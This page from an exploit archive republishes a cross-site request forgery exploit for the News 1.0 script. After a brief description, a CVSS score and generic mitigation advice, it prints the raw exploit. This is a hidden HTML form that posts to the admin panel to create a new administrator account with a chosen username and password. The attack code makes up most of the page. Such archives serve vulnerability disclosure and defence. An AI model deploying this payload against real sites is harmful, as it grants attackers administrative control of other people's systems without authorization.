Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
News 1.0 XSRF Vulnerability (Add Admin) - exploit.company
header-logo
Suggest Exploit
vendor:
News 1.0
by:
AtT4CKxT3rR0r1ST
5.5
CVSS
MEDIUM
XSRF
CWE
Product Name: News 1.0
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

News 1.0 XSRF Vulnerability (Add Admin)

This exploit allows an attacker to add an admin user to the News 1.0 system without proper authorization. The exploit consists of a form that sends a POST request to http://localhost/News/admin/index.php with the necessary parameters to add a new user with admin privileges. The parameters include the username, password, email, and group ID. The attacker can modify these parameters to add any desired user.

Mitigation:

To mitigate this vulnerability, it is recommended to implement proper authorization and authentication mechanisms in the application. Additionally, input validation should be performed on all user-supplied data to prevent malicious actions.
Source

Exploit-DB raw data:

News 1.0 XSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://allomani.com/en/news_script.html
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/News/admin/index.php">
<input type="hidden" name="action" value="adduserok"/>
<input type="hidden" name="hash" value="e10adc3949ba59abbe56e057f20f883e"/>
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="Example@hotmail.com"/>
<input type="hidden" name="group_id" value="1"/>
<input type="hidden" name="useraddbutton" value="Add"/>
</form>

</body>
</html>
####################################################################